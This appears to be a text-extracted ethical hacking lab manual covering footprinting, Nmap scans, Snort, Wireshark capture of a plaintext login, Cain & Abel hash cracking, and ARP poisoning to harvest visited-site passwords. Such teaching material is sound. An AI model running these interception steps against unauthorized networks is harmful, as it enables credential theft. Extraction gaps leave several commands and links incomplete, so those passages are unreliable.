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1 Module -I
Unit Structure
1.0 Objective
1.1 Introduction of Footprinting and Reconnaissance
1.2 Performing footprinting using Google Hacking
1.3 Website information
1.3.1 Information about an archived website
1.3.2 To extract c ontents of a website
1.4 To trace any received email
1.5 To fetch DNS information
1.6 Summary
1.7 List of References
1.8 Bibliography
After going through this module, you will be able to:
 Know the hacking of Footprinting and Reconnaissance.
 Study and understand how to gather and review information related
using different foot printing techniques
 Study and understand website information like archived website and
extract contents of a website.
 Study and understand trace out email.
 Study and und erstand to fetch DNS information.
Foot printing (sometimes it’s also called Reconnaissance). It means
gathering information about a target system that can be executed cyber

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2 attack. For this method hacke rs might use different methods or different
This is simple method for hackers to know the information about the
system and devices or network.
Types of Footprints
a) Active Footprinting: It means performing footprinting by getting
indirect touch wi th target machine.
b) Passive Footprinting: It means collecting information about a system
located at remote distance from the attacker.
These are information gathered from footprinting
● Operating System from target machine
● IP address
● Firewall
● Network Map
● Security configurations of the target machine
● Email ID
● Password
● Server Configuration
● URL’s (Uniform Resource Locator)
● VPN (Virtual Private Network)
From different resources we do footprinting
● Search Engine
● Website
● Social Engineering
● Email Tracking
● social media
Advantages of Footprinting
1) It allows hackers to gather the basic security configurations of target
2) It is best method of vulnerabilities.

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3 3) By using this hacker identify as to which attacker is handier to hack the
target system.
To gather the information hackers may use search engines like Google.
Google may be used to know the information of target system. If hackers
know how to use search engines or google then hackers collect mor e
information like company details, company policies, careers etc. This is
passive information gathering method it includes name, personal details,
geographical location, login pages, internet portal information and
sometime target system operating system, internet protocol (IP) address of
that system, Netblock information, web technologies used, different web
application used by that system all this information gathered through
search engine.
For example, we must search or gather information from search en gine
footprinting using google hacking.

It displays the information, videos, images related our search.

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4 When click on next page we get more information

Different operators are used to find information with Google. There are
several server operators are present like
● cache: It Displays the cheche of domain.
● filetype: It displays the types of files of target system or domains used
file type like PHP, PDF, TXT.
● inurl: Matches the text which is URL
● intitle: This allows user to search t he pages with the text with html
page title.
● allinetext: It requires a page to match all of the given text.
● allinurl: Returns all the matching criteria
For example, we can use these operators to find any devices which is
connected to the internet like web camera. From Google you can gain very
sensitive information. A term exists for the people who does not know the
disadvantages of post the information they are called “Google Dorks”
Google Dorking is the technique used by hackers to find the information
exposed accidently to the internet.

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Footprinting and
Website footprinting is the technique which is used to extract the details
related to website. When we are browsing any website or any target
website, we may provide this information
● Whose websit e (name, contact number, emails etc)
● Which software used? Version of that software.
● Operating system details
● Domains details
● Sub-domain details.
● Scripting platform
● File name and file path
When hacker wants to get details information about any website, it m ay be
1) Achieved the description of website
2) Content Management system and framework
3) Web Crawling
4) Script and platform of website and web server
5) Extract metadata and contact details from website.
6) Website and web page monitoring and analyzer
Whois is the too l which is used to renowned internet record listing to
identify the who owns a domain or who registered that domain and contact
1.3.1 Information about an archived website
When hacker or any user wants to archived website or history of website,
they can use www.archieve .org is the online tool which allows us to archived version of
website. It is referring to the older version of the website which is existed
a time before and changed is the website that collect all
snapshots of all the websites of all the regular interval of the time.
Step 1: Type in Google

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Step2: Click on Internet Archive

Step 3: You can enter Domain name in the search box.

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7 Step 4: Suppose we want to check for Wikipedia, so we entered the search

Step 5: For how the website was looking and are the pages are present on
that website with different dates.

1.3.2 To extract contents of a website:
Web Data Extractor pro is web scraping tool designed for mass gathering
diffe rent data types. With the help of web data extractor, you can custom
extraction structured data.
Start with the new project then type in URL then click on meta tag.

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The entire website can be mirrored using tool like HTT tacker to collect
information at own phase.
Email footprinting is used for collecting information from emails by
monitoring the email delivery and checking with headers. Where email
headers give information about the mail server’s, original mail sender
emai l id It gives architecture of target network.
We can gain information from email footprinting
● IP address of recipient
● Email delivery information
● Geolocation of recipient
● Visited links
● OS Information
● Browser information
● Reading Time

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Footprinting and
9 Email herders include information like
● Email address of sender
● IP address of sender
● Mail Server Information
● Send and delivery stamp
● Unique number of messages
Different tools are used for email footprinting
1) Email tracker pro
2) What is my IP address
Email t racker pro:
Whenever we have to install email tracker pro, we need to install two
key’s components
1)Java version 6 or above
2)Microsoft .net framework 4.0 must installed
Step1: Type in google email Tracker pro download.Then click button to
download emailt rackerPro.

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10 Step2: Click on next button

Step4: Choose the components .

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11 Step5: By clicking on finish button, finish the installation.

Step 6: After the completion of installation add your email address by
clicking on sign up button.

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12 Step 7: Fill this information.

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13 Step 8: Now open any email that you want to trace and click on three dots
and select show original message and copy the message in clipboard.

Step 9: Now click on trace header button its display below window.

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14 Step 10: Now paste original message in the email headers section.

Step 11: Click on Trace button.

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15 Step 12: To view report click the button view report it displays all

DNS means Domain Name System is system which allo ws us to convert
Computer IP address into human readable domain name. Basically, DNS
footprinting is used to gather information about DNS zone data. Attackers
use DNS information to determine key hosts in the network
Different tools we can use like

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16 DNS record type used by DNS editor who make changes in DNS server.
DNS records provides information about location and ty pes of servers.
Records Description
A (address) - Shows IP Address
MX (Mail Exchange) - Shows Domain Name Server
CNAME(Canonical name) - points one or sub domain or additional
names for address record
NS (Name Server) - Shows Host Name Server
SRV (Service) - Shows Service Records
PTR(Pointer) - maps IP address to Host name
RP - Responsible person
HINFO - Host information Records
TXT - Where records point to

DNS servers perform zone transfers to keep updated information. A zone
transfer of a target domain gives list of public networks, IP address and
record type.
For Domain Name information you can use
this website gives us all information of domain like name, owner,
registration, expiry, servers name etc.
Step 1: Just Put website address in Google that is

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Footprinting and
17 Step 2: It goes to the website where we have to put domain name or IP
address of target domain.

Stpe3: For example, we can consider the It displays all
information of domain Wikipedia.

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2) NS Lookup:
To check N S lookup command on windows just go to the cmd from start
Step 1: Type nslookup command in cmd

Step 2: For example, we put it displays below information.

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Footprinting and
19 3) To find out IP address you can use ping command in windows and
Linux also.
Ex. We have to find IP address of google then command is,

4) Different commands for Linux/Unix:
If you are using Linux/Unix operating system, then you have to use
commands like
1) Dig -is command -based tool used for DNS records and name serve rs. To
detect DNS type
Syntax: dig
Ex. dig
2) nslookup commands -to perform DNS lookup
Syntax: nslookup
Ex. nslookup
3) Ping -For IP address as well as quicky find DNS records.
Syntax: ping
Ex. ping g
Footprinting means gathering information about a target system that can
be executed cyber -attack. For this method hackers might use different
methods or different tools. Hackers gathers information from footprinting.
It is best method of finding vulnerabilities. There are different ways to
find the information on target network or target system such as Search
Engine, Website, Social Engineering, Domain Name System, Email
Tracking, and social media.

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20 By using Google search, we get name, personal details, geographical
location, login pages, internet portal information and sometime target
system, operating system, internet protocol (IP) address of that system,
Netblock information, web technologies used, A different web application
used by that system all this information gathered through search engines. is the online tool which allows us to the archived version of
website. It is referring to the older version of the website which is existed
a time before and changed one.
For DN S footprinting, we can use this
website gives us all information about domain like name, owner,
registration, expiry, server name etc. or nslookup or command which
treats as tool like ping, dig.
1) Footprinting%20
(also%20 known %20as%20 reconnaissance, to%20crack %20a% 20
whole%20 system.
3) -hacking -footprinting/
4) -ethical -
6) -sea/
7) -is-footprinting -what -is-
reconnaissance -hacking -hacker -social -engineering -ids-security -ceh-
nslookup -nmap/
8) -guide -website -footprinting/
9) -overview/
10) -you-need-to-know -about -footprinting -
and-its-techniques -e42cc90c3245
11) -footprinting/
1) Manthan Desai, Basics of ethical hacking for beginners
2) Tutorials Point professionals, Ethical Hacking.
3) Matt Walker, All -In-One-CEH -Certified -Ethical -Hacker -Exam -


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21 2
Unit Structure
2.1 Practical no -1: Port Scanning
2.1.1 Aim
2.1.2 Objective
2.1.3 Theory
2.1.4 Procedure
2.2 Practical No -2: Network Scanning
2.2.1 Aim
2.2.2 Objective
2.2.3 Theory
2.2.4 Procedure Ping S can Host Scan UDP scan OS Detection Scan Version Scan Protocol Scan
2.3 Practical No -3: IDS Tool
2.3.1 Aim
2.3.2 Objective
2.3.3 Theory
2.3.4 Procedure
2.4 Practical No -4: Network Sniffing
2.4.1 Aim
2.4.2 Objective

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22 2.4.3 Theory
2.4.4 Procedure
2.5 Question
2.1.1 Aim:
Performing Port scanning using Nmap tool.
2.1.2 Objective:
The objective of this practical is to study and understands the concept of
port scanning.
2.1.3 Theory:
A por t is a virtual location where networking communication starts and
ends (in a nutshell).
A port scanner is a computer program that examines network ports for one
of three possible condition – open, closed, or filtered.
Port scanning can provide information such as:
a) Services that are running
b) Users who own services
c) Whether unknown logins are allowed
d) Which network services require authentication
Port scanners are valuable tools in diagnosing network and connectivity
issues. However, attackers use port scanners to detect possible access
points for intrusion and to identify what kinds of devices you are running
on the network, like firewalls, proxy servers or VPN servers.
Some of the Port Scanning Tools are as follows: -
1. Nmap
2. Solarwinds Port Scanner
3. Netcat
4. Advanc ed Port Scanner
5. Net Scan Tools

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Scanning networks,
Enumeration and sniffing
23 2.1.4 Procedure:
Scanning Port using Nmap tool
Nmap Tool: Nmap is a free, open source and multi -platform network
security scanner used for network discovery and security auditing. Nmap
can be extremely useful for helping yo u get to the root of the problem you
are investigating, verify firewall rules or validate your routing tables are
configured correctly.
Link to download nmap -7.92 for windows platform: d.html .
Nmap needs Npcap which is the Nmap Project's packet capture (and
sending) library for Microsoft Windows.
Link to download Npcap 0.9984 for windows platform:
Once Nmap and Npcap is installed on the computer,we can start with port
1) Scan open ports (syntax: nmap –open ip_address / url )

Scanning port with the IP Address.

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24 2) Scan single port (syntax: nmap -p 80 ip_address)

3) Scan specified range of ports (syntax: nmap -p 1-200 ip_address)

4) Scan entire port range (syntax: nmap -p 1-65535 ip_address)

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25 5) Scan top 100 ports (fast scan) (syntax: nmap -F ip_address )

2.2.1 Aim:
Performing Network scanning using Nmap to ol.
2.2.2 Objective:
The objective of this practical is to study and understands the concept of
Network scanning.
2.2.3 Theory:
Network scanning is a technique that is used to gather information
regarding computing systems by making the use of a computer n etwork.
Network scanning is mainly used for security assessment, system
maintenance, and also for performing attacks by hackers.
The purpose of network scanning is as follows:
● Recognize available UDP and TCP network services running on the
targeted hosts
● Recognize filtering systems between the user and the targeted hosts
● Determine the operating systems (OSs) in use by assessing IP
● Evaluate the target host's TCP sequence number predictability to
determine sequence prediction attack and TCP spoofing .
Some of the Top Network Scanning Tools (IP and Network Scanner) are
as follows: -
1. Auvik
2. SolarWinds Network Device Scanner
3. ManageEngine OpUtils
4. Intruder

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26 5. Syxsense
6. PRTG Network Monitor
7. Perimeter 81
8. OpenVAS
9. Wireshark
10. Nikto
11. Angry IP Scanner
12. Advanced IP Scanner
13. Qualys Freescan
14. SoftPerfect Network Scanner
15. Retina Network Security Scanner
16. Nmap
2.2.4 Procedure:
Scanning network using Nmap tool:
Nmap is also used to scan networks. Nmap is now one of the core tools
used by network administrators to map their networks. The program can
be used to find live hosts on a network, perform port scanning, ping
sweeps, OS detection, and version detection. Ping Scan – It returns a list of hosts on your network and the total
number of assigned IP addresses. If you spot any hosts or IP addresses on
this list that you cannot account for, you can then run further commands to
investigate them further.
Syntax: nmap -sP Host Scan – Unlike a ping scan, a host scan actively sends ARP
request packets to all t he hosts connected to your network. Each host then
responds to this packet with another ARP packet containing its status and
MAC address. This can be a powerful way of spotting suspicious hosts
connected to your network.

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27 Syntax:nmap -sP

● Host scan Indetifies active host(s) in a network
● It Sends ARP request packets to all systems in the target.
● Host Scan Results, “Host is up” by receiving MAC address from
each active host.
syntax: nmap -sP
nmap -sn

Nmap uses the “ -sP / -sn “ flag for host scan and broadcasts ARP request
packet to identify IP allocated to the particular host machine. It will
broadcast ARP requests for a particular IP in that network which can be
the part of IP range -225 is used to ind icate that we want to
scan all the 256 IPs in our network. After the active host will unicast the
ARP packet by sending its MAC address as a reply which gives a message
Host is up.
>>If you see anything unusual in this list, you can then run a DNS
query on a specific host, by using:
Syntax: namp -sL

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28 UDP Scan
UDP services are mostly ignored during penetration tests, but fine
penetration testers know that they often expose host essential information
or can even be vulnerable, moreover used to compromise a host. This
method demonstrates how to utilize Nmap to list all open UDP ports on a
UDP scan works by sending a UDP packet to every destination port and
analyzes the response to determine the port’s state; it is a connection -less
protocol. For some common ports such as 53 and 161, a protocol -specific
payload is sent to increase the response rate, a service will respond with a
UDP packet, proving that it is “open”. If the port is “closed”, an ICMP
Port Unreachable message is receiv ed from the target. If no response is
received after retransmissions, the port is classified as “open|filtered”. This
means that the port could be open, or perhaps packet filters are blocking
the communication.
syntax: nmap -sU OS Detect ion Scan
Apart from the open port enumeration Nmap is quite useful in OS
fingerprinting. This scan is very helpful to the penetration tester in order to
conclude possible security vulnerabilities and determine the available
system calls to set the specific exploit payloads.
Syntax: nmap -O
After running the above command, we will get the information about:
● Device type
● Running
● OS CPE (Common Platform Enumeration) cpe:/o –> OS and cpe:/h
–> hardware
● OS details –> human readable report of the operatin g system.
The option -O inform Nmap to enable OS detection that identifies a wide
variety of systems, including residential routers, IP webcams, operating

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Scanning networks,
Enumeration and sniffing
29 systems, and many other hardware devices. You can also execute the
following command for os detection .
nmap -O -p- –osscan -guess in case OS identification fails, try
to guess the operating system.
nmap -O –osscan -limit try to launch OS detection if scan
conditions are ideal. Version Scan
When doing vulnerability assessments of your companies or clients, you
really want to know which mail and DNS servers and versions are
running. Having an accurate version number helps dramatically in
determining which exploits a server is vulnerable to. Fingerprinting a
service may also reveal a dditional information about a target, such as
available modules and specific protocol information. Version scan is also
categorized as Banner Grabbing in penetration testing.
syntax: nmap -sV
nmap -sV -p135 #specific port version scan

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30 Protocol Scan
IP Protocol scan is very helpful for determining what communication
protocols are being used by a host. This method shows how to use Nmap
to compute all of the IP protocols, where sends a raw IP packet without
any additional pro tocol header, to each protocol on the target machine. For
the IP protocols TCP, ICMP, UDP, IGMP, and SCTP, Nmap will set valid
header values but for the rest, an empty IP packet will be used.
syntax: nmap -sO

2.3.1 Aim:
Applying Intrusion Detection System using snort tool.
2.3.2 Objective:
The objective of this practical is to study and understands various tools
available for IDS and use snort for observing packets.
2.3.3 Theory:
Network intrusion represents long -term damage to your network security
and the protection of sensitive data.
An Intrusion Detection System (IDS) monitors network traffic for unusual
or suspicious activity and sends an alert to the administrator. Detection of
stran ge activity and reporting it to the network administrator is the primary
function of IDS. However, some IDS software can take action based on
rules when malicious activity is detected, for example blocking certain
incoming traffic.
Some of the best Intrusio n Detection System Software and Tools are as
1. Solar Winds Security Event Manager EDITOR’S CHOICE
Analyzes logs from Windows, Unix, Linux, and Mac OS systems. It
manages data collected by Snort, including real -time data. SEM is also

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Scanning networks,
Enumeration and sniffing
31 an intrusion prev ention system, shipping with over 700 rules to shut
down malicious activity.
2. Crowd Strike Falcon A cloud -based endpoint protection platform that
includes threat hunting.
3. Manage Engine Event Log Analyzer A log file analyzer that
searches for evidence of intru sion.
4. Manage Engine Log360 This SIEM package uses UEBA to establish
a baseline of normal activity and then looks for deviations from that
norm. Runs on Windows Server.
5. Snort Provided by Cisco Systems and free to use, leading network -
based intrusion detectio n system software.
6. OSSEC Excellent host -based intrusion detection system that is free to
7. Suricata Network -based intrusion detection system software that
operates at the application layer for greater visibility.
8. Zeek Network monitor and network -based i ntrusion prevention
9. Sagan Log analysis tool that can integrate reports generated on snort
data, so it is a HIDS with a bit of NIDS.
10. Security Onion Network monitoring and security tool made up of
elements pulled in from other free tools.
Types of In trusion Detection Systems
There are two main types of intrusion detection systems: -
1. Host -based Intrusion Detection System (HIDS) – this system will
examine events on a computer on your network rather than the traffic
that passes around the system.
2. Network -based Intrusion Detection System (NIDS) – this system
will examine the traffic on your network.
2.3.4 Procedure:
In this practical we are going to use snort as a IDS tool
Snort is a free open -source network intrusion detection system (NIDS) and
intrusion prevention system (IPS). Snort IPS uses a series of rules that
help define malicious network activity and uses those rules to find packets
that match against them and generates alerts for users.

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32 Snort can be configured in three main modes:
Sniffer M ode: The program will read network packets and display them
on the console.
Packet Logger Mode: The program will log packets to the disk.
Network Intrusion Detection System Mode: The program will monitor
network traffic and analyze it against a rule set de fined by the user. The
program will then perform a specific action based on what has been
Snort requirements (you need these to be able to install Snort on
Installation packages:
a) Snort: Snort 2_9_12 Installer.exe
b) WinPcap: WinPcap_4_1_3 .exe
c) Snort rules: snortrules -snapshot -29120.tar.gz
d) (Optional) Syslog server. SyslogServer -1.2.3 -win32.exe
Link to download Snort_2_9_18_1_Installer.x64.exe for Windows
Platform: .
Link to download the rules for snort:
You can Sign up to snort to get more detailed rules.
Snort needs Npcap or WinPcap. Link to download Npcap 0.9984 for
windows platform:
Once you have completed installing these components, you can check to
see if the program responds:
1. Change to the Snort program directory: c: \>cd \Snort \bin
2. Check the installed version for Snort: c: \Snort \bin>snort -V
3. The -V option (it must be a capital V) simply returns the current
installed version of the program. If Snort is installed on the system, you
should see something similar to the screenshot below : -
Command : snort -V

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To see a list of interfaces run the following command:
>snort -W

On command prompt execute the following command:

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34 Once you press enter after writing the command you will start receiving
packet information as shown below: -

To end capt uring the packet details press ctrl +c.
The following command will invoke the Helps.
>>Snort --h
Running Snort in Sniffer mode
If you’re running Snort from the command line with two network
adapters, specify which adapter to monitor:
C:\>snort -v -i#
# is the number of the applicable adapters (as shown on the output of the
snort -W command).
You must use this -i switch whenever you run the snort program on the
command line. Sniffer mode is the simplest iteration of Snort. To run it,

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35 follow these steps: fro m the command line (within the %SnortPath% \bin
directory .
The following command runs Snort as a packet sniffer with the verbose
switch, outputting TCP/IP packet headers to the screen. Press Ctrl+C keys
to stop the output. Snort/WinPcap summarizes its acti vities, as shown in
the following screenshot.
Command: Snort -v -i3

After pressing ctrl +c Key you will get the report as follows:

Note: Read the setup and configuration of Snort from While
this is a demo, Snort can be configured thousands o f ways to detect and
alert you in the event you have malicious activity on your network.
Downloading signatures often is extremely important.

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2.4.1 Aim:
Performing network sniffing using Wireshark.
2.4.2 Objective:
The objective of this practical is to study and understands the concept of
network sniffing using Wireshark.
2.4.3 Theory:
Computers communicate using networks. These networks could be on a
local area network LAN or exposed to the internet. Network Sniffers a re
programs that capture low -level package data that is transmitted over a
network. An attacker can analyze this information to discover valuable
information such as user ids and passwords.
Network sniffing is the process of capturing data packets sent ove r a
network. This can be done by the specialized software program or
hardware equipment. Sniffing can be used to;
● Capture sensitive data such as login credentials
● Eavesdrop on chat messages
● Capture files that have been transmitted over a network
The follow ing are protocols that are vulnerable to sniffing
● Telnet
● Rlogin
The above protocols are vulnerable if login details are sent in plain text
2.4.4 Procedure:
Network sniffing using Wireshark:
Wireshark is a free and open -source pa cket analyzer. It is used for network
troubleshooting, analysis, software and communications protocol
development, and education. Wireshark is cross -platform, using the Qt
widget toolkit in current releases to implement its user interface, and using
pcap t o capture packets; it runs on Linux, macOS, BSD, Solaris, some
other Unix -like operating systems, and Microsoft Windows. There is also
a terminal -based (non -GUI) version called TShark. Wireshark is used to

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Enumeration and sniffing
37 capture and analyse packets in network. It is also used as a sniffer,
network protocol analyzer, and network analyser. We can also apply
specific filter on network traffic to get more filtered data packets.
Link to download Wireshark 3.4.8 for windows platform:
Wireshark needs Npcap. Link to download Npcap 0.9984 for windows
1) Wireshark userinterface:

2) Capturing Live Network Da ta
To capture Live Network Data double click on any of the interface in the
welcome screen.

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38 Once you doble click on the inface you will start getting packet detail
entering and leaving the network as shown below:

3) Viewing Captured Packets
Double cli ck on any of the packet that you want to view. Another window
will open ,showing the details of the selected packet as shown below:

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39 4) Filtering Packets

The red box button “STOP” on the top left side of the window can be
clicked to stop the capturing o f traffic on the network.
Color Coding
Different packets are seen highlighted in various different colors. This is
Wireshark’s way of displaying traffic to help you easily identify the types
of it. Default colors are:

● Light Purple color for TCP traffic
● Light Blue color for UDP traffic

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40 ● Black color identifies packets with errors – example these
packets are delivered in an unordered manner.
To check the color coding rules click on View and select Coloring Rules.
These color coding rules can be customized an d modified to fit your
5) Sniffing the network using Wireshark
we are going to use Wireshark to sniff data packets as they are transmitted
over HTTP protocol.
For example
Step 1: Start Wireshark and start capturing network
Step 2 : Login to a web application that does not use secure
communication. We will login to a web application on address with the login name is, and the password is Password2010.
Note: we will login to the web app for demonstration pur poses only.

Step3: Go Back to wireshark and stop the live capture.
Step 4: Enter filter for HTTP protocol results only using filter textbox and
press enter key.

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Step5: Select frame from packet list with post/index.php
Step 6: Look for the summary th at says HTML Form URL Encoded:
application/x -www -form -urlencoded

1) Why would a hacker use a proxy server?
A. To create a stronger connection with the target.
B. To create a ghost server on the network.
C. To obtain a remote access connection.
D. To hide malicious activity on the network.

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Ethical Hacking Lab

42 2) What is the proper command to perform an Nmap XMAS scan every
A. nmap -sX -sneaky
B. nmap -sX -paranoid
C. nmap -sX -aggressive
D. nmap -sX -polite
3) Which of the following tech -concepts cannot be sniffed?
A. Router configu ration
B. ISP details
C. Email Traffic
D. Web Traffic
4) What are the different ways to classify an IDS?
A. Zone based
B. Host & Network based
C. Network & Zone based
D. Level based
5) One of the most obvious places to put an IDS sensor is near the
firewall. Where exactly in relatio n to the firewall is the most
productive placement?
A. Inside the firewall
B. Outside the firewall
C. Both inside and outside the firewall
D. Neither inside the firewall nor outside the firewall.


Page 43

43 3
Using Cryptool to encrypt and decrypt password using RC4
algorithm .
Unit Structure
3.0 Objective
3.1 Introduction
3.2 Summary
3.3 References
3.4 Unit End Exercises
Study and understand Se ssion hijacking and cryptography and use the
tools to practically understand how the attacks take place. Password
cracking, ARP spoofing and encryption & decryption.
Ethical hacking is to scan vulnerabilities and to find potential threats on a
computer or networks. An ethical hacker finds the weak points or
loopholes in a computer, web applications or network and reports them to
the organization. So, let's explore more about Ethical Hacking step -by-
Step -1

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Ethical Hacking Lab

44 Step 2:
∙ Click Encrypt/Decrypt Tab
∙ Select Symmetric (Modern)
∙ Using RC4.

Step 3: Encryption using RC4.

Page 45

Malware Threats: Worms,
viruses, Trojans

Step 4:Decryption using RC4.

Use Cain and Abel for cracking Windows account password using
Dictionary attack and to decode wireless network passwo rds.
1. Install chain and Abel software.
2. Click on Hash Calculator

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Ethical Hacking Lab


3:- Enter the password to convert into hash Paste the value into the
field you have converted e.g(MD5)

4:- Right Click on the hash and select the dictionary attack.

5:- Then right c lick on the file and select (Add to List) and then
select the Wordlist
6:- Select all the options and start the dictionary attack

Page 47

Malware Threats: Worms,
viruses, Trojans
Using Traceroute, ping, ifconfig, netstat Command
3.1) Using Traceroute, ping, ifconfig, netstat Command
Step 1: Type tracert com mand and type press “Enter”.
Tracert: -
The tracert command is a Command Prompt command that's used to show
several details about the path that a packet takes from the computer or
device you're on to wh atever destination you specify.
Tracert [ -d] [ -h MaxHops] [ -w TimeOut] [ -4] [ -6] target
esfromyourcomputer to one you specify. It will list all the routers it passes
through until it reaches its destination, or fails to and is discarded. In
addition to this, it will tell you how long each 'hop' from router to router

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Ethical Hacking Lab

48 Step 2 : Ping all the IP addresses
Ping: -
The ping command is a Command Prompt command used to te st the
ability of the source computer to reach a specified destination
computer. The ping command is us uallyusedasa simple way to
verify that a computer can communicate over the network with
another computer or network device .
Ping [-t] [-a] [-n count] [ -l size] [ -f] [-i TTL] [ -v
TOS] [ -r count] [ -s count] [ -w timeout] [ -R] [- S
srcaddr] [ -p] [-4] [-6] target [/?]

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Malware Threats: Worms,
viruses, Trojans

Step 3: - run ipconfig/ifconfig
Ipconfig is a DOS utility that can be used from M S-DOS and the
Windows command line to displaythe network settings currently
assigned and given by a network. This command can be utilized to
verify a network connection as well as to verify your
networksettings .
ipconfig [/all compartments] [/? | /al l | /renew [adapter] | /release
[adapter] | /renew6 [adapter] | /release6
[adapter] | /flushdns | /displaydns | /registerdns | /showclassid
adapter | /setclassid adapter [classid] |

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Ethical Hacking Lab

50 /showclassid6 adapter | /setclassid6 adapter [classid] ]

Step 4: - run netstat
The netstat command, meaning network statistics , is a Command
Prompt command used to display very detailed information about how
your computer is communicating with other computers or
dualnetwork connections, overall a nd protocol -specific networking
statistics, and much more, all of which could help troubleshoot certain
kinds of networking issues.

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Malware Threats: Worms,
viruses, Trojans
51 Syntax
netstat [-a] [-b] [-e] [-f] [-n] [-o] [-p protocol ] [-r] [-s] [-t] [-x] [-y]
[time_interval ] [/?]

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Ethical Hacking Lab

52 Step5: - run ARP command
ARP commandtoviewandmodifytheARPtableentriesonthelocalcomputer.
Thismay display all the known connections on your local area network
segment (if they have been active and in the cache). The arpcommand is
useful for viewing the ARP cache and resolving address
Syntax (Inet means Internet address)
arp[-a [InetAddr] [ -N IfaceAddr]] [ -g [InetAddr] [ -N IfaceAddr]] [ - d
InetAddr [IfaceAddr]] [ -s InetAddrEtherAddr [IfaceAddr]]
On Linux rform A RP Poisoning inWindows

Page 53

Malware Threats: Worms,
viruses, Trojans
Step 1: Download and install Cain &Abel software in VMware.
Step 2: GO to sniffer and then click on configuration, select the
appropriate wireless adapter. Click on apply and then click on Ok button.

Step 3: Activat e sniffer

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Ethical Hacking Lab


Step 4: click on + icon. Check all tests checkbox and then click ok

Step 5: click on APR then click on blank screen and then click on the +
icon. Select any IP address (IPv4 address)

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Malware Threats: Worms,
viruses, Trojans
55 Step 6: select all the IP address and MAC address and then click on
OKply ARP.

8: Go to any website on source ip address.

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Step 9: Go to password option in the cain&abel and see the visited
site password.

 Tutorials Point professionals, Ethical Hacking.
1. Password crack with cain and abel application


Page 57

57 4
Unit Structure
4.0 Objective
4.1 Introduction
4.2 Summary
4.3 References
4.4 Unit End Exercises
The purpose of malware is to intrude on a machine for a variety of
reasons. From theft of financial detai ls, to sensitive corporate or personal
information, malware is best avoided, for even if it has no malicious
purpose at present, it could well have so at some point in the future.
Malware, or malicious software, is any program or file that is intentionally
harmful to a computer, network or server.
Types of malware include computer viruses, worms, Trojan
horses, ransomware and spyware. These malicious programs steal, encrypt
and delete sensitive data; alter or hijack core computing functions and
monitor end users' computer activity.
What does malware do?
Malware can infect networks and devices and is designed to harm those
devices, networks and/or their users in some way.
Depending on the type of malware and its goal, this harm may present
itself differently to the user or endpoint. In some cases, the effect malware
has is relatively mild and benign, and in others, it can be disastrous.
No matter the method, all types of malware are designed to exploit devices
at the expense of the user and to the benefit of the hacker -- the person
who has designed and/or deployed the malware.
How do malware infections happen?
Malware authors use a variety of physical and virtual means to spread
malware that infects devices and networks. For example, malicious
programs can be delivered to a system with a USB drive, through popular

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Ethical Hacking Lab

58 collaboration tools and by drive -by downloads, which automatically
download malicious programs to systems without the user's approval or
Phishing attacks are another common type of malware delivery where
emails disguised as legitimate messages contain malicious links or
attachments that deliver the malware executable file to unsuspecting users.
Sophisticated malware attacks often feature the use of a command -and-
control serv er that enables threat actors to communicate with the infected
systems, exfiltrate sensitive data and even remotely control the
compromised device or server.
Emerging strains of malware include new evasion and obfuscation
techniques designed to not only fool users, but also security administrators
and antimalware products. Some of these evasion techniques rely on
simple tactics, such as using web proxies to hide malicious traffic or
source IP addresses. More sophisticated threats include polymorphic
malwa re that can repeatedly change its underlying code to avoid detection
from signature -based detection tools; anti -sandbox techniques that enable
malware to detect when it is being analyzed and to delay execution until
after it leaves the sandbox; and fileles s malware that resides only in the
system's RAM to avoid being discovered.

A diagram of the various types of malware.
Different types of malware have unique traits and characteristics. Types of
malware include the following:
● A virus is the most common ty pe of malware that can execute itself
and spread by infecting other programs or files.
● A worm can self -replicate without a host program and typically
spreads without any interaction from the malware authors.

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Developing and implementing
59 ● A Trojan horse is designed to appear as a legiti mate software
program to gain access to a system. Once activated following
installation, Trojans can execute their malicious functions.
● Spyware collects information and data on the device and user, as
well as observes the user's activity without their know ledge.
● Ransomware infects a user's system and encrypts its data.
Cybercriminals then demand a ransom payment from the victim in
exchange for decrypting the system's data.
● A rootkit obtains administrator -level access to the victim's system.
Once installed, the program gives threat actors root or privileged
access to the system.
● A backdoor virus or remote access Trojan (RAT) secretly creates a
backdoor into an infected computer system that enables threat actors
to remotely access it without alerting the user or the system's
security programs.
● Adware tracks a user's browser and download history with the intent
to display pop -up or banner advertisements that lure the user into
making a purchase. For example, an advertiser might use cookies to
track the webpages a user visits to better target advertising.
● Keyloggers, also called system monitors, track nearly everything a
user does on their computer. This includes emails, opened webpages,
programs and keystrokes.
How to detect malware
Users may be able to detect ma lware if they observe unusual activity such
as a sudden loss of disk space, unusually slow speeds, repeated crashes or
freezes, or an increase in unwanted internet activity and pop -up
Antivirus and antimalware software may be installed on a device to detect
and remove malware. These tools can provide real -time protection
or detect and remove malware by executing routine system scans.
Windows Defender, for example, is Microsoft antimalware software
included in the Windows 10 operating system (OS) under the Windows
Defender Security Center. Windows Defender protects against threats
such as spyware, adware and viruses. Users can set automatic "Quick" and
"Full" scans, as well as set low, medium, high and severe priority alerts.

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Ethical Hacking Lab


The steps involved in an organization's malware response plan.
How to remove malware
As mentioned, many security software products are designed to detect and
prevent malware, as well as remove it from infected systems.
Malware bytes is an example of an antimalware tool that handles detection
and removal of malware. It can remove malware from Windows, macOS,
Android and iOS platforms. Malware bytes can scan a user's registry files,
running programs, hard drives and individual files. If d etected, malware
can then be quarantined and deleted. However, unlike some other tools,
users cannot set automatic scanning schedules.
How to prevent malware infections
There are several ways users can prevent malware. In the case of
protecting a personal computer, users can install antimalware software.
Users can prevent malware by practicing safe behavior on their computers
or other personal devices. This includes not opening attachments from
strange email addresses that may contain malware disguised as a
legitimate attachment -- such emails may even claim to be from legitimate
companies but have unofficial email domains.
Users should update their antimalware software regularly, as hackers
continually adapt and develop new techniques to breach security sof tware.
Security software vendors respond by releasing updates that patch those
vulnerabilities. If users neglect to update their software, they may miss out
on a patch that leaves them vulnerable to a preventable exploit.

Page 61

Developing and implementing
61 In enterprise settings, networks a re larger than home networks, and there
is more at stake financially. There are proactive steps companies should
take to enforce malware protection. Outward -facing precautions include
the following:
● Implementing dual approval for business -to-business (B2B)
transactions; and
● Implementing second -channel verification for business -to-consumer
(B2C) transactions.
Business -facing, internal precautions include the following:
● Implementing offline malware and threat detection to catch malicious
software before it sp reads;
● Implementing allow list security policies whenever possible; and
● Implementing strong web browser -level security.
Creating a Virus
Usually, a computer virus does is made by three parts:
1. The infection vector: this part is responsible to find a target and
propagates to this target
2. The trigger: this is the condition that once met execute the payload
3. The payload: the malicious function that the virus carries around
Let’s start coding.
